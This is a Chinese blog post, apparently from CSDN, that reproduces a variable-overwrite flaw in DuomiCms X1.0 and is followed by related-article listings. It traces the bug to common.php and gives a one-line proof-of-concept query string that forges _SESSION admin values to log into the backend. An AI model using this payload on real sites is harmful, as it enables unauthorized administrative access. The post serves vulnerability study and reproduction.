DuomiCms X1.0 变量覆盖漏洞复现

最新推荐文章于 2023-12-20 10:57:28 发布
最新推荐文章于 2023-12-20 10:57:28 发布
阅读量265 收藏
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51681694/article/details/130312289
版权

1.漏洞成因

漏洞点在 /domiphp/common.php 的 52行代码上

上面的代码是对用户的 get,post,cookie传参进行处理,将上述的参数名字都作为变量名字,将参数值都作为变量值。从而导致了可能的变量覆盖漏洞(右侧的函数是对双引号单引号转义处理)

2.漏洞利用

尝试自定义session

首先插桩查看管理员session

 

 查找一些引用了漏洞文件的页面

比如

 /interface/comment.php

构造poc:

?_SESSION[duomi_ckstr]=jcfe&_SESSION[duomi_admin_id]=1&_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_name]=admin

 访问后成功登录后台

 

 

rneck
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
多米cmsduomicms变量覆盖漏洞(超详细)
kiwi的博客
11-01 839
本文章我借鉴了代码审计实战 - FreeBuf网络安全行业门户的文章,文章写的比较详细,大家也可以看看他写的文章。
代码审计duomicms变量覆盖漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-16 659
变量覆盖漏洞 什么是变量覆盖变量覆盖指的是可以用我们的传参值替换程序原有的变量值 如下 <?php $a=123; $a=1; echo $a; ?> 怎么去寻找变量覆盖? 经常导致变量覆盖漏洞场景有: $$使用不当,extract()函数使用不当,parse_str()函数使用不当import_request_variables()使用不当,开启了全局变量注册等。 经常引发变量覆盖漏洞的函数有:extract() parse_str() import_request_variab
Duomicms_X2.0变量覆盖通杀漏洞复现
seek_2022的博客
07-13 1677
出于学习和技术分享的目的撰写了本文,希望能给读者们学习挖掘此类漏洞提高一点参考。
Duomicms变量覆盖
yqdid的博客
04-20 348
Duomicms变量覆盖漏洞 由于是第一次搞这个 ,不是很懂。。 所以 思路是参考这位博主的 https://www.cnblogs.com/Qiuzhiyu/p/11923471.html 首先去了解一下 变量覆盖漏洞的原理: 变量覆盖漏洞是指可以用我们自定义的参数值替换程序原有的变量值,从而产生漏洞。大多都是由于函数使用不当导致,经常导致变量覆盖漏洞的函数有:extract()函数、pars...
DuomiCms中的变量覆盖漏洞复现
huang145247的博客
10-25 212
只有一个方法,而且这个方法是调用$zip对象中的方法,并不是php的内置函数,不符合要求,找下一个方法parse_str(),没结果(没结果不展示了,节省空间)这一个函数是用来转义魔术引号的,也就是说是用来防止注入的,如果我们可以通过上面找到的创建变量的方法来进行变量覆盖即可绕过这个过滤方法。由于原文件不存在危险函数,所以我们需要寻找包含common.php文件的文件(包含common.php的文件有可能会调用这个函数)是但是有很多,我们慢慢找,找到可以利用的创建变量方法。由此联想到session覆盖
duomicms 变量覆盖漏洞复现
qq_59023242的博客
12-19 885
文件common.php,通用模块文件,可能是一个对外部提交的参数做处理的文件,暂时没有问题,可以先查看哪些文件调用了这个文件。
DuomiCMS代码审计-变量覆盖漏洞复现
最新发布
小小小屿屿屿的博客
12-20 1585
Duomicms是一个开源免费的系统,但是其中也存在漏洞,本文从代码审计角度去详细阐述其中存在的一个变量覆盖漏洞
多米(DuomiCms)影视管理系统 X1.1
11-27
**多米(DuomiCms)影视管理系统 X1.1** 多米(DuomiCms)影视管理系统是一款基于PHP和MYSQL数据库的高效内容管理平台,专为影视网站设计和开发。该系统以其卓越的访问速度和强大的负载能力,确保了在高流量环境下也能...
DuomiCms 多米影视管理系统 X2.0
11-27
3. DuomiCms 升级日志.txt:记录了系统从旧版本到X2.0的升级过程和改进内容,对于已经使用过先前版本的用户来说,这是了解新特性的重要参考。 4. DuomiCms 安装说明.txt:提供了安装系统的步骤和注意事项,对于初次...
多米(DuomiCms)影视管理系统 X2.0
10-22
X1.1修复解析播放器修复后台推广选项X1.0核心文件开源 新增采集资源管理[资源库列表&资源库管理]新增下载来源管理新增资源API插件[共享自己资源给别人采集] 后台控制开关 文件在根目录zyapi.php新增百度推送新增...
多米(DuomiCms)影视管理系统 视频点播系统 视频网站源码
01-05
DuomiCms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持主分类,扩展分类,剧情分类三种分类方式,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 DuomiCms是基于PHP+MySql技术开发的影视管理系统,强劲功能、卓越性能、安全健壮。简单易用、制作模板方便。构架稳健,平滑升级。 多米(DuomiCms)影视管理系统 v1.32 更新日志: 修复迅雷下载功能 修复模板错位代码 修复后台第三方采集资源 修复延迟加载图片以及代码 美化后台部分代码 去除部分无效代码 新增显示官方版本 新增官方资源 新增14个解析播放器 修复无效播放器默认支持解析
多米(DuomiCms)影视管理系统
02-01
一套完整的多米(DuomiCms)影视管理系统
多米(DuomiCms)影视管理系统 v1.3 utf-8
12-06
多米影视管理系统(DuomiCms,多米CMS)是一套专为不同需求的而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需3分钟即可建立一个海量的视频讯息的行业网站。 DuomiCms采用PHP+MYSQL架构,原生PHP代码带来
DuoMiCms资源采集插件 v3.1.zip
07-14
DuoMiCms资源采集插件 更新日志: 2016-10-06更新说明: 1、去除无效资源接口 2、修复C值资源站接口 3、新增授权资源站接口 DuoMiCms资源采集插件简介 DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。 DuoMiCms资源采集插件页面展示 相关阅读 同类推荐:站长常用源码
DuoMiCms资源采集插件 v3.1
12-04
DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。 重要提示: 200在线资源和C值部分需要解析。201C值资源需要解析。 如果你们没有接口可以下载下方借口。 使用说明: 将文件api.php ...
DuoMiCms资源采集插件 v2.0
12-05
DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。
Duomicms变量覆盖漏洞
B_roin的博客
04-19 594
变量覆盖 1.变量覆盖是指可以用我们的传参值替换程序原有的变量值 2.经常导致变量覆盖漏洞场景有:$$(可变变量)使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等 1 . extract()函数:从数组中将变量导入到当前的符号表 (来源:菜鸟教程) [该函数使用数组键名作为变量名,使用...
Duomicms1.32代码执行漏洞(个人理解)
kiwi的博客
10-30 952
代码审计实战 - FreeBuf网络安全行业门户与DuomiCMS 前台命令执行 // 云屿's Blog (cloudyu.me)的文章的帮助本文章可能有写的不对的地方或者思路需要改进的地方,欢迎师傅们批评指正。
DuomiCms
qq_45835337的博客
04-19 543
根据观察,管理用户界面是admin.php,于是打开 require_once(dirname(__FILE__).'/../duomiphp/common.php'); require_once(duomi_INC."/check.admin.php"); if(empty($dopost)) { $dopost = ''; } //检测安装目录安全性 if( is_dir(dirname(_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值